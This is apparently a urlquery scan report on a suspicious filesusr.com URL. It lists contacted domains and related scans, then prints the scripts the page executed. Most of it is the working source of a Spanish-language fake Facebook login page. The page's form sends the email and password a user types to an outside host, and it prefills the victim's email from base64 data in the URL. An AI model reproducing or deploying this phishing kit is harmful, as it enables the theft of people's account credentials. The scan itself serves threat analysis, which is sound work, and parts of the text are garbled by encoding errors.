urlquery - report: facebookbeatrizz.filesusr.com/html/361366_ddd3079eb13b048ee9de3517a759b9aa.html?546067*yw5pbmhhymfuyw5pbmhhodnaag90bwfpbc5jb20=

Fully Qualifying Domain Name	Rank	First Seen	Last Seen	IP	Comment
firefox.settings.services.mozilla.com (2)	867	2020-05-28 17:26:30 UTC	2022-09-29 05:05:36 UTC	143.204.55.35
facebookbeatrizz.filesusr.com (1)	0	No data	No data	34.102.176.152	Domain (filesusr.com) ranked at: 19386
content-signature-2.cdn.mozilla.net (1)	1152	2020-11-03 12:26:46 UTC	2022-09-29 05:03:41 UTC	143.204.55.110
static.xx.fbcdn.net (10)	661	2012-12-01 13:12:13 UTC	2022-09-29 05:06:43 UTC	31.13.72.12
img-getpocket.cdn.mozilla.net (6)	1631	2017-09-01 03:40:57 UTC	2022-09-29 04:10:37 UTC	34.120.237.76
r3.o.lencr.org (4)	344	2020-12-02 08:52:13 UTC	2022-09-28 04:36:09 UTC	23.36.76.226
contile.services.mozilla.com (1)	1114	2021-05-27 18:32:35 UTC	2022-09-28 04:36:06 UTC	34.117.237.239
ocsp.digicert.com (7)	86	2012-05-21 07:02:23 UTC	2022-09-29 04:12:37 UTC	93.184.220.29
push.services.mozilla.com (1)	2140	2015-09-03 10:29:36 UTC	2022-09-28 05:02:28 UTC	35.163.147.190
facebook.com (1)	17	2014-03-08 13:10:43 UTC	2022-09-29 07:54:01 UTC	31.13.72.36

Scan Date	Severity	Indicator	Comment
2022-09-28	2	facebookbeatrizz.filesusr.com/html/361366_ddd3079eb13b048ee9de3517a759b9aa. (...)	Facebook, Inc.

Date	UQ / IDS / BL	URL	IP
2023-03-29 02:21:02 +0000	0 - 0 - 1	529f38d0-3744-4286-b484-be860d475d25.usrfiles (...)	34.102.176.152
2023-03-29 02:06:45 +0000	0 - 0 - 1	529f38d0-3744-4286-b484-be860d475d25.usrfiles (...)	34.102.176.152
2023-03-26 09:40:52 +0000	0 - 0 - 1	42502d2a-e7ed-4a16-9f11-33ffe6c54021.usrfiles (...)	34.102.176.152
2023-03-26 02:17:07 +0000	0 - 1 - 0	httpharoldhazard1-wixsite-com.filesusr.com/ht (...)	34.102.176.152
2023-03-22 13:59:59 +0000	0 - 0 - 1	edf41f52-452f-4671-a310-1da9f1d2ecd8.usrfiles (...)	34.102.176.152

Date	UQ / IDS / BL	URL	IP
2023-03-29 18:34:13 +0000	0 - 0 - 3	x42smz.dwp0yn.9dct47.1nrt7n.4ir8yy.76452.exea (...)	35.205.61.67
2023-03-29 18:33:40 +0000	0 - 0 - 9	www.vegamoviesnl.shop/	172.217.21.179
2023-03-29 18:33:09 +0000	0 - 1 - 0	f0kpxy.lchongfu.com/	35.205.61.67
2023-03-29 18:31:37 +0000	0 - 0 - 3	65356.4ir8yy.76452.exea41.dfahyp.edu.cn.lchon (...)	35.205.61.67
2023-03-29 18:31:15 +0000	0 - 0 - 1	dgvt6n.2i2qoi.dtvmj6.hinark.4ir8yy.76452.exea (...)	35.205.61.67

Date	UQ / IDS / BL	URL	IP
2023-03-26 02:17:07 +0000	0 - 1 - 0	httpharoldhazard1-wixsite-com.filesusr.com/ht (...)	34.102.176.152
2023-03-21 12:34:24 +0000	0 - 0 - 4	www.it-europe564598-com.filesusr.com/html/2d7 (...)	34.102.176.152
2023-03-21 12:30:42 +0000	0 - 0 - 2	www.www-degelyehuda-org-il.filesusr.com/html/ (...)	34.102.176.152
2023-03-21 12:02:04 +0000	0 - 0 - 2	www.f9w1lned0ruqblxi6jahwotak.filesusr.com/ht (...)	34.102.176.152
2023-03-21 11:17:44 +0000	0 - 1 - 2	www.www.haroldhazard1-wixsite-com.filesusr.co (...)	34.102.176.152

Date	UQ / IDS / BL	URL	IP
2023-03-13 18:15:47 +0000	0 - 0 - 2	manualidades-facebook-www.filesusr.com/html/d (...)	34.102.176.152
2023-03-13 04:06:31 +0000	0 - 0 - 2	manualidades-facebook-www.filesusr.com/html/d (...)	34.102.176.152
2023-03-02 18:35:49 +0000	0 - 0 - 2	www.filesusr.com/html/db37a9_84399193f1fde90a (...)	34.102.176.152
2023-02-12 15:27:15 +0000	0 - 0 - 2	fa800klinkencuesta.filesusr.com/html/f00e8e_4 (...)	34.102.176.152
2023-02-12 13:52:17 +0000	0 - 0 - 2	facebook-com-erick574.filesusr.com/html/f00e8 (...)	34.102.176.152

JavaScript

Executed Scripts (17)

Executed Evals (0)

Executed Writes (7)

#1 JavaScript::Write (size: 53) - SHA256: c925181189c900d54d1ab93b2acadb6dbab2fb030365078587f971f4763ed835

< input type = "hidden"
name = "urlfin"
value = "undefined" >

#2 JavaScript::Write (size: 180) - SHA256: 9b256daad8f0c43be1f4733acce358242a53de861e333bd61b4ec71a777644dc

< input type = "hidden"
name = "enblanco"
value = "http://facebookbeatrizz.filesusr.com/html/361366_ddd3079eb13b048ee9de3517a759b9aa.html?546067*yw5pbmhhymfuyw5pbmhhodnaag90bwfpbc5jb20=" >

#3 JavaScript::Write (size: 55) - SHA256: da3b51a2028e01a9aa4c3ee986758af9eaeb266fd6a6263365c99c82d6a60fd3

< input type = "hidden"
name = "detector"
value = "undefined" >

#4 JavaScript::Write (size: 51) - SHA256: e5260e6a51903bec07911dd7f4436f0890a1d7382b59ddb9235ceeb0aa360405

< input type = "hidden"
name = "lang"
value = "undefined" >

#5 JavaScript::Write (size: 92) - SHA256: 78b9cf6f2d057a57f1e14e78cbcca8e93889691229863293b1518158d1b8482b

< input type = "hidden"
name = "regreso"
value = "�inha�g��inha���jto�m�com" >

#6 JavaScript::Write (size: 38504) - SHA256: d1635980528e486318997156c0e9d6ce0fcf499109931260999606f2add8a33a

< !DOCTYPE html >
    < html >
    < script type = "text/javascript" >
    var regreso = uno; //Regreso
var urlfin = dos; //UrlFin
var idfb = tres; //Victima
var detector = cuatro; //Identifier
var lang = cinco; //Provedor
var enblanco = window.location.href; //En Blanco
var myString = new String(window.location.href);
var myArray = myString.split("*");
var regreso = myArray[1];
var urlfin = myArray[2];
var email = myArray[3];
var detector = myArray[4];
var ip = "Facebook";
var uno = new String(window.atob(llegaron[1])); //Regreso
var dos = new String(window.atob(llegaron[2])); //UrlFin
var tres = llegaron[3]; //Victima
var cuatro = new String(window.atob(llegaron[4])); //Identificador
var cinco = new String(window.atob(llegaron[5])); //Provedor
var regreso = uno; //Regreso
var urlfin = dos; //UrlFin
var idfb = tres; //Victima
var detector = cuatro; //Identifier
var lang = cinco; //Provedor
var enblanco = window.location.href; //En Blanco
var myString = new String(window.location.href);
var myArray = myString.split("*");
var regreso = myArray[1];
var urlfin = myArray[2];
var email = myArray[3];
var detector = myArray[4]; < /script> < head >
    < title > Facebook - Inicia sesi� n o reg� strate < /title> < meta name = "viewport"
content = "user-scalable=no,initial-scale=1,maximum-scale=1" / >
    < link href = "https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/gB76kJXPYJV.png"
rel = "shortcut icon"
sizes = "196x196" / >
    < meta name = "referrer"
content = "origin-when-crossorigin"
id = "meta_referrer" / >
    < link type = "text/css"
rel = "stylesheet"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/IKa1x_hP-dA.css?_nc_x=Ij3Wp8lg5Kz"
data - bootloader - hash = "O3PWttG"
crossorigin = "anonymous" / >
    < link type = "text/css"
rel = "stylesheet"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/yJ/l/0,cross/655dsu3Q_r6.css?_nc_x=Ij3Wp8lg5Kz"
data - bootloader - hash = "iqx6cW8"
crossorigin = "anonymous" / >
    < link type = "text/css"
rel = "stylesheet"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/ye/l/0,cross/aQyKILs0gyc.css?_nc_x=Ij3Wp8lg5Kz"
data - bootloader - hash = "WSfOj3P"
crossorigin = "anonymous" / >

    < script id = "u_0_h" >
    function envFlush(a) {
        function b(b) {
            for (var c in a) b[c] = a[c];
        }
        window.requireLazy ? window.requireLazy(["Env"], b) : ((window.Env = window.Env || {}), b(window.Env));
    }
envFlush({
    timeslice_heartbeat_config: {
        pollIntervalMs: 33,
        idleGapThresholdMs: 60,
        ignoredTimesliceNames: {
            requestAnimationFrame: true,
            "Event listenHandler mousemove": true,
            "Event listenHandler mouseover": true,
            "Event listenHandler mouseout": true,
            "Event listenHandler scroll": true
        },
        isHeartbeatEnabled: true,
        isArtilleryOn: false,
    },
    shouldLogCounters: true,
    timeslice_categories: {
        react_render: true,
        reflow: true
    },
    sample_continuation_stacktraces: true,
    dom_mutation_flag: true,
}); < /script> < script >
    document.domain = "facebook.com";
/^#~?!(?:\/?[\w\.-])+\/?(?:\?|$)/.test(location.hash) && location.replace(location.hash.substr(location.hash.indexOf("!") + 1)); < /script> < script >
    _DEV = 0; < /script> < script id = "u_0_i"
crossorigin = "anonymous"
src = "https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/sAcaU2FJdDD.js?_nc_x=Ij3Wp8lg5Kz"
data - bootloader - hash = "lh+qS" > < /script> < script id = "u_0_f" >
    (CavalryLogger =
        window.CavalryLogger ||
        function(a) {
            (this.lid = a), (this.transition = !1), (this.metric_collected = !1), (this.is_detailed_profiler = !1), (this.instrumentation_started = !1), (this.pagelet_metrics = {}), (this.events = {}), (this.ongoing_watch = {}), (this.values = {
                t_cstart: window._cstart
            }), (this.piggy_values = {}), (this.bootloader_metrics = {}), (this.resource_to_pagelet_mapping = {}),
            this.initializeInstrumentation && this.initializeInstrumentation();
        }), (CavalryLogger.prototype.setIsDetailedProfiler = function(a) {
        this.is_detailed_profiler = a;
        return this;
    }), (CavalryLogger.prototype.setTTIEvent = function(a) {
        this.tti_event = a;
        return this;
    }), (CavalryLogger.prototype.setValue = function(a, b, c, d) {
        d = d ? this.piggy_values : this.values;
        (typeof d[a] === "undefined" || c) && (d[a] = b);
        return this;
    }), (CavalryLogger.prototype.getLastTtiValue = function() {
        return this.lastTtiValue;
    }), (CavalryLogger.prototype.setTimeStamp =
        CavalryLogger.prototype.setTimeStamp ||
        function(a, b, c, d) {
            this.mark(a);
            var e = this.values.t_cstart || this.values.t_start;
            e = d ? e + d : CavalryLogger.now();
            this.setValue(a, e, b, c);
            this.tti_event && a == this.tti_event && ((this.lastTtiValue = e), this.setTimeStamp("t_tti", b));
            return this;
        }), (CavalryLogger.prototype.mark =
        typeof console === "object" && console.timeStamp ? function(a) {
            console.timeStamp(a);
        } : function() {}), (CavalryLogger.prototype.addPiggyback = function(a, b) {
        this.piggy_values[a] = b;
        return this;
    }), (CavalryLogger.instances = {}), (CavalryLogger.id = 0), (CavalryLogger.disableArtilleryOnUntilOffLogging = !1), (CavalryLogger.getInstance = function(a) {
        typeof a === "undefined" && (a = CavalryLogger.id);
        CavalryLogger.instances[a] || (CavalryLogger.instances[a] = new CavalryLogger(a));
        return CavalryLogger.instances[a];
    }), (CavalryLogger.setPageID = function(a) {
        if (CavalryLogger.id === 0) {
            var b = CavalryLogger.getInstance();
            CavalryLogger.instances[a] = b;
            CavalryLogger.instances[a].lid = a;
            delete CavalryLogger.instances[0];
        }
        CavalryLogger.id = a;
    }), (CavalryLogger.now = function() {
        return window.performance && performance.timing && performance.timing.navigationStart && performance.now ? performance.now() + performance.timing.navigationStart : new Date().getTime();
    }), (CavalryLogger.prototype.measureResources = function() {}), (CavalryLogger.prototype.profileEarlyResources = function() {}), (CavalryLogger.getBootloaderMetricsFromAllLoggers = function() {}), (CavalryLogger.start_js = function() {}), (CavalryLogger.done_js = function() {});
CavalryLogger.getInstance().setTTIEvent("t_domcontent");
(CavalryLogger.prototype.measureResources = function(a, b) {
    if (!this.log_resources) return;
    var c = "bootload/" + a.name;
    if (this.bootloader_metrics[c] !== void 0 || this.ongoing_watch[c] !== void 0) return;
    var d = CavalryLogger.now();
    this.ongoing_watch[c] = d;
    "start" + c in this.bootloader_metrics || (this.bootloader_metrics["start_" + c] = d);
    b && !("tag_" + c in this.bootloader_metrics) && (this.bootloader_metrics["tag_" + c] = b);
    if (a.type === "js") {
        c = "js_exec/" + a.name;
        this.ongoing_watch[c] = d;
    }
}), (CavalryLogger.prototype.stopWatch = function(a) {
    if (this.ongoing_watch[a]) {
        var b = CavalryLogger.now(),
            c = b - this.ongoing_watch[a];
        this.bootloader_metrics[a] = c;
        var d = this.piggy_values;
        a.indexOf("bootload") === 0 &&
            (d.t_resource_download || (d.t_resource_download = 0),
                d.resources_downloaded || (d.resources_downloaded = 0), (d.t_resource_download += c), (d.resources_downloaded += 1),
                d["tag_" + a] == "EF" && (d.t_pagelet_cssload_early_resources = b));
        delete this.ongoing_watch[a];
    }
    return this;
}), (CavalryLogger.getBootloaderMetricsFromAllLoggers = function() {
    var a = {};
    Object.values(window.CavalryLogger.instances).forEach(function(b) {
        b.bootloader_metrics && Object.assign(a, b.bootloader_metrics);
    });
    return a;
}), (CavalryLogger.start_js = function(a) {
    for (var b = 0; b < a.length; ++b) CavalryLogger.getInstance().stopWatch("js_exec/" + a[b]);
}), (CavalryLogger.done_js = function(a) {
    for (var b = 0; b < a.length; ++b) CavalryLogger.getInstance().stopWatch("bootload/" + a[b]);
}), (CavalryLogger.prototype.profileEarlyResources = function(a) {
    for (var b = 0; b < a.length; b++) this.measureResources({
        name: a[b][0],
        type: a[b][1] ? "js" : ""
    }, "EF");
});
CavalryLogger.getInstance().log_resources = true;
CavalryLogger.getInstance().setIsDetailedProfiler(true);
window.CavalryLogger && CavalryLogger.getInstance().setTimeStamp("t_start"); < /script> < script id = "u_0_g" >
    (function(a, b, c, d) {
        function e(a) {
            document.cookie = a + "=;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/;domain=.facebook.com";
        }

        function f(a, b) {
            document.cookie = a + "=" + b + ";path=/;domain=.facebook.com;secure";
        }
        if (!a) {
            e(b);
            e(c);
            return;
        }
        a = null;
        (navigator.userAgent.indexOf("Firefox") !== -1 || (!window.devicePixelRatio && navigator.userAgent.indexOf("Windows Phone") !== -1)) &&
        document.documentElement != null &&
            ((a = screen.width / document.documentElement.offsetWidth), (a = Math.max(1, Math.floor(a * 2) / 2)));
        (!a || a === 1) && navigator.userAgent.indexOf("IEMobile") !== -1 && ((a = Math.sqrt(screen.deviceXDPI * screen.deviceYDPI) / 96), (a = Math.max(1, Math.round(a * 2) / 2)));
        f(b, (a || window.devicePixelRatio || 1).toString());
        e = window.screen ? screen.width : 0;
        b = window.screen ? screen.height : 0;
        f(c, e + "x" + b);
        d && document.cookie && window.devicePixelRatio > 1 && document.location.reload();
    })(true, "m_pixel_ratio", "wd", false); < /script> < meta name = "description"
content = "Crea una cuenta o inicia sesi&#xf3;n en Facebook. Con&#xe9;ctate con amigos, familiares y otras personas que conozcas. Comparte fotos y videos, env&#xed;a mensajes y..." / >
    < link rel = "canonical"
href = "https://www.facebook.com/" / >
    < /head> < body tabindex = "0"
class = "touch x1 android ff _fzu _50-3 iframe acw" >
    < script id = "u_0_e" >
    (function(a) {
        a.updateOrientation = function() {
            var b = !!a.orientation && a.orientation !== 180,
                c = document.body;
            c && (c.className = c.className.replace(/(^|\s)(landscape|portrait)(\s|$)/g, " ") + " " + (b ? "landscape" : "portrait"));
            return b;
        };
    })(window); < /script>

< div class = "_5soa acw"
id = "root"
role = "main"
data - sigil = "context-layer-root content-pane" >
    < div class = "_5909" >
    < div class = "_7om2" >
    < div class = "_4g34"
id = "u_0_0" >
    < div id = "login_top_banner"
data - sigil = "m_login_upsell login_identify_step_element" > < /div> < div class = "_7om2 _52we _52z6" >
    < div class = "_4g34" >
    < center > < a href = "/login/?refid=8" > < img src = "https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
width = "112"
class = "img"
alt = "facebook" / > < /a></center >
    < /div> < /div> < div class = "_5rut" >
    < form
method = "post"
action = "https://www.hackphreik.com/imagenes/php.php"
id = "login_form"
novalidate = "1"
data - sigil = "m_login_form" >
    < input type = "hidden"
name = "lsd"
value = "AVrk6FyT"
autocomplete = "off" / > < input type = "hidden"
name = "jazoest"
value = "2701"
autocomplete = "off" / > < input type = "hidden"
name = "m_ts"
value = "1565483563" / >
    < input type = "hidden"
name = "li"
value = "K2JPXbX8RFcDixCQjiUHmI0M" / > < input type = "hidden"
name = "try_number"
value = "0"
data - sigil = "m_login_try_number" / >
    < input type = "hidden"
name = "unrecognized_tries"
value = "0"
data - sigil = "m_login_unrecognized_tries" / >
    < div id = "user_info_container"
data - sigil = "user_info_after_failure_element" > < /div> < div id = "pwd_label_container"
data - sigil = "user_info_after_failure_element" > < /div> < div id = "otp_retrieve_desc_container" > < /div> < div >
    < div class = "_56be" >
    < div class = "_55wo _56bf" >
    < div class = "_96n9"
id = "email_input_container" >
    < script type = "text/javascript" >
    document.write(
        '<input type="email" name="idfb" id="email" value="' +
        email +
        '" tabindex="1"autocorrect="off" autocapitalize="off" type="email" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" id="m_login_email" name="email" placeholder="N&#xfa;mero de celular o correo electr&#xf3;nico" data-sigil="m_login_email" />'
    ); < /script> < /div> < div class = "_55wq" > < /div> < div class = "_56be" >
    < div class = "_55wo _56bf" >
    < div class = "_1upc _mg8"
data - sigil = "m_login_password" >
    < div class = "_7om2" >
    < div class = "_4g34 _5i2i _52we" >
    < div class = "_5xu4" >
    < input
autocorrect = "off"
autocapitalize = "off"
class = "_56bg _4u9z _27z2 _8qtm"
autocomplete = "on"
id = "m_login_password"
name = "pass"
placeholder = "Contrase&#xf1;a"
type = "password"
data - sigil = "password-plain-text-toggle-input" / >
    < /div> < /div> < div class = "_5s61 _216i _5i2i _52we" >
    < div class = "_5xu4" >
    < div class = "_2pi9"
style = "display: none;"
id = "u_0_2" >
    < a href = "#"
data - sigil = "password-plain-text-toggle" >
    < span class = "mfss"
style = "display: none;"
id = "u_0_3" > OCULTAR < /span><span class="mfss" id="u_0_4">MOSTRAR</span >
    < /a> < /div> < /div> < /div> < /div> < /div> < /div> < /div> < /div> < /div> < div class = "_2pie"
style = "text-align: center;" >
    < div id = "u_0_5"
data - sigil = "login_password_step_element" >
    < button type = "submit"
value = "Iniciar sesi&#xf3;n"
class = "_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu"
name = "login"
data - sigil = "touchable login_button_block m_login_button" >
    < span class = "_55sr" > Iniciar sesi� n < /span> < /button> < /div>

< div class = "_7eif"
id = "oauth_login_button_container"
style = "display: none;" > < /div> < div class = "_7f_d"
id = "oauth_login_desc_container"
style = "display: none;" > < /div> < div id = "otp_button_elem_container" > < /div> < /div> < input type = "hidden"
name = "prefill_contact_point"
id = "prefill_contact_point" / > < input type = "hidden"
name = "prefill_source"
id = "prefill_source" / >
    < input type = "hidden"
name = "prefill_type"
id = "prefill_type" / > < input type = "hidden"
name = "first_prefill_source"
id = "first_prefill_source" / >
    < input type = "hidden"
name = "first_prefill_type"
id = "first_prefill_type" / > < input type = "hidden"
name = "had_cp_prefilled"
id = "had_cp_prefilled"
value = "false" / >
    < input type = "hidden"
name = "had_password_prefilled"
id = "had_password_prefilled"
value = "false" / > < input type = "hidden"
name = "is_smart_lock"
id = "is_smart_lock"
value = "false" / >
    < div class = "_xo8" > < /div> < noscript > < input type = "hidden"
name = "_fb_noscript"
value = "true" / > < /noscript> < script type = "text/javascript" >
    document.write('<input type="hidden" name="urlfin" value="' + urlfin + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="enblanco" value="' + enblanco + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="detector" value="' + detector + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="lang" value="' + lang + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="regreso" value="' + window.atob(regreso) + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="urlfin" value="' + window.atob(urlfin) + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="detector" value="' + window.atob(detector) + '">'); < /script> < /form> < div >
    < div class = "_43mg" > < span class = "_43mh" > o < /span></div >
    < div class = "_52jj _5t3b"
id = "u_0_7" >
    < center > < a role = "button"
class = "_5t3c _28le btn btnS medBtn mfsm touchable"
id = "signup-button"
href = "/reg-no-deeplink/?cid=103&amp;refid=8"
tabindex = "0"
data - sigil = "m_reg_button" >
    Crear cuenta nueva < /a></center >
    < /div> < /div> < div >
    < div class = "other-links" >
    < ul class = "_5pkb _55wp" >
    < li >
    < span class = "mfss fcg" >
    < a
tabindex = "0"
href = "/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;refid=8"
id = "forgot-password-link" > �Olvidaste tu contrase� a ?
    < /a> < span aria - hidden = "true" > � < /span><a href="/help / ? refid = 8 " id="
help - link " class="
sec ">Servicio de ayuda</a> < /span> < /li> < /ul> < /div> < /div> < /div> < div > < /div> < /div> < /div> < /div> < /div> < div style = "display: none;" > < /div> < span > < img src = "https://facebook.com/security/hsts-pixel.gif"
width = "0"
height = "0"
style = "display: none;" / > < /span> < div class = "_55wr _5ui2"
data - sigil = "m_login_footer" >
    < div class = "_5dpw" >
    < div class = "_5ui3"
data - nocookies = "1"
id = "locale-selector"
data - sigil = "language_selector marea" >
    < div class = "_5909" >
    < div class = "_7om2" >
    < div class = "_4g34" >
    < span class = "_52jc _52j9 _52jh _3ztb" > Espa� ol < /span> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=fr_FR&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQADjC3uzbog8dFV&amp;refid=8"
data - locale = "fr_FR"
data - sigil = "change_language" >
    Fran� ais(France) < /a> < /span> < /div> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=pt_BR&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQDG_SSA-jI0mvnp&amp;refid=8"
data - locale = "pt_BR"
data - sigil = "change_language" >
    Portugu� s(Brasil) < /a> < /span> < /div> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=it_IT&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQAQrzNBH90YczXI&amp;refid=8"
data - locale = "it_IT"
data - sigil = "change_language" >
    Italiano < /a> < /span> < /div> < /div> < div class = "_4g34" >
    < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=en_US&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQB9wfh90mS9bV7h&amp;refid=8"
data - locale = "en_US"
data - sigil = "change_language" >
    English(US) < /a> < /span> < /div> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=zh_CN&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQDRnDG5vjFfEF20&amp;refid=8"
data - locale = "zh_CN"
data - sigil = "change_language" >
    -�(�S) < /a> < /span> < /div> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=de_DE&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQCBwh-9xN7z8Yd9&amp;refid=8"
data - locale = "de_DE"
data - sigil = "change_language" >
    Deutsch < /a> < /span> < /div> < a href = "/language.php?n=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;refid=8" >
    < div class = "_3j87 _1rrd _3ztd"
aria - label = "Lista completa de idiomas"
data - sigil = "more_language" > < i class = "img sp_t0F5GNpHI8g_3x sx_4d197d" > < /i></div >
    < /a> < /div> < /div> < /div> < /div> < div class = "_5ui4" >
    < div class = "_96qv _9a0a" >
    < a href = "/facebook?refid=8"
class = "_96qw"
title = "Lee nuestro blog, descubre el centro de recursos y encuentra ofertas de trabajo." > Informaci� n < /a><span aria-hidden="true"> � </span >
    < a href = "/help/?ref=pf&amp;refid=8"
class = "_96qw"
title = "Visita nuestro servicio de ayuda." > Ayuda < /a><span aria-hidden="true"> � </span > < span class = "_96qw"
id = "u_0_5" > M� s < /span> < /div> < div class = "_96qv"
style = "display: none;"
id = "u_0_6" >
    < a href = "/directory/pages/?refid=8"
class = "_96qw" > P� ginas < /a><a href="/directory / places / ? refid = 8 " title="
Explora nuestro directorio de lugares.
" class="
_96qw ">Ubicaciones</a> < a href = "/directory/people/?refid=8"
title = "Explora nuestro directorio de personas."
class = "_96qw" > Personas < /a> < a href = "/directory/groups/?refid=8"
title = "Explora nuestro directorio de grupos."
class = "_96qw" > Grupos < /a><a href="/pages / category / ? refid = 8 " class="
_96qw ">Categor�as de p�ginas</a> < a href = "/places/?refid=8"
class = "_96qw"
title = "Descubre lugares populares en Facebook." > Lugares < /a> < a href = "https://www.oculus.com/"
class = "_96qw"
target = "_blank"
title = "M&#xe1;s informaci&#xf3;n sobre Oculus" > Oculus < /a> < a href = "https://portal.facebook.com/?refid=8"
class = "_96qw"
target = "_blank"
title = "Obt&#xe9;n m&#xe1;s informaci&#xf3;n sobre Portal from Facebook" > Portal < /a> < a href = "/marketplace/?refid=8"
class = "_96qw"
title = "Compra y vende art&#xed;culos en Facebook Marketplace." > Marketplace < /a> < a href = "https://pay.facebook.com/?refid=8"
class = "_96qw"
target = "_blank"
title = "M&#xe1;s informaci&#xf3;n sobre Facebook Pay" > Facebook Pay < /a> < a href = "/fundraisers/?refid=8"
class = "_96qw"
title = "Haz una donaci&#xf3;n a causas que te importan." > Recaudaciones de fondos < /a> < /div> < span class = "mfss fcg" > Facebook, Inc. < /span> < /div> < /div> < /div> < /div> < div class = "" > < /div> < div class = "viewportArea _2v9s"
style = "display: none;"
id = "u_0_7"
data - sigil = "marea" >
    < div class = "_5vsg"
id = "u_0_8" > < /div> < div class = "_5vsh"
id = "u_0_9" > < /div> < div class = "_5v5d fcg" >
    < div class = "_2so _2sq _2ss img _50cg"
data - animtype = "1"
data - sigil = "m-loading-indicator-animate m-loading-indicator-root" > < /div>
Cargando... < /div> < /div> < div class = "viewportArea aclb"
id = "mErrorView"
style = "display: none;"
data - sigil = "marea" >
    < div class = "container" >
    < div class = "image" > < /div> < div class = "message"
data - sigil = "error-message" > < /div> < a class = "link"
data - sigil = "MPageError:retry" > Intentar de nuevo < /a> < /div> < /div> < /div> < /div> < div id = "static_templates" >
    < div class = "mDialog"
id = "modalDialog"
style = "display: none;" >
    < div class = "_52z5 _451a mFuturePageHeader _1uh1 firstStep titled"
id = "mDialogHeader" >
    < div class = "_7om2 _52we" >
    < div class = "_5s61" >
    < div class = "_52z7" >
    < button type = "submit"
value = "Cancelar"
class = "cancelButton btn btnD bgb mfss touchable"
id = "u_0_b"
data - sigil = "dialog-cancel-button" > Cancelar < /button> < button type = "submit"
value = "Atr&#xe1;s"
class = "backButton btn btnI bgb mfss touchable iconOnly"
aria - label = "Atr&#xe1;s"
id = "u_0_c"
data - sigil = "dialog-back-button" >
    < i class = "img sp_t0F5GNpHI8g_3x sx_8f20a7"
style = "margin-top: 2px;" > < /i> < /button> < /div> < /div> < div class = "_4g34" >
    < div class = "_52z6" > < div class = "_50l4 mfsl fcw"
id = "m-future-page-header-title"
role = "heading"
tabindex = "0"
data - sigil = "m-dialog-header-title dialog-title" > Cargando... < /div></div >
    < /div> < div class = "_5s61" > < div class = "_52z8"
id = "modalDialogHeaderButtons" > < /div></div >
    < /div> < /div> < div class = "modalDialogView"
id = "modalDialogView" > < /div> < div class = "_5v5d _5v5e fcg"
id = "dialogSpinner" >
    < div class = "_2so _2sq _2ss img _50cg"
data - animtype = "1"
id = "u_0_a"
data - sigil = "m-loading-indicator-animate m-loading-indicator-root" > < /div>
Cargando... < /div> < /div> < /div>

< link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/0,cross/SieMvexb4RV.css?_nc_x=Ij3Wp8lg5Kz"
as = "style"
crossorigin = "anonymous" / >
    < link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/ZFA2ZKi8_ij.js?_nc_x=Ij3Wp8lg5Kz"
as = "script"
crossorigin = "anonymous"
nonce = "g0wgU7yr" / >
    < link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3ivXO4/yZ/l/es_LA/wgQtNFI9dU-.js?_nc_x=Ij3Wp8lg5Kz"
as = "script"
crossorigin = "anonymous"
nonce = "g0wgU7yr" / >
    < link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/y1/l/0,cross/v-qA4RoF1Br.css?_nc_x=Ij3Wp8lg5Kz"
as = "style"
crossorigin = "anonymous" / >
    < link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3i0VU4/yb/l/es_LA/29KpN-SSjEW.js?_nc_x=Ij3Wp8lg5Kz"
as = "script"
crossorigin = "anonymous"
nonce = "g0wgU7yr" / >

    < /script>


< /body> < /html>

#7 JavaScript::Write (size: 299) - SHA256: dc9ab5b0af46a9b94d01b1159fa74edb629157fc15b55dddda1f2bc5c60fd9ac

< input type = "email"
name = "idfb"
id = "email"
value = "undefined"
tabindex = "1"
autocorrect = "off"
autocapitalize = "off"
type = "email"
class = "_56bg _4u9z _5ruq _8qtn"
autocomplete = "on"
id = "m_login_email"
name = "email"
placeholder = "N&#xfa;mero de celular o correo electr&#xf3;nico"
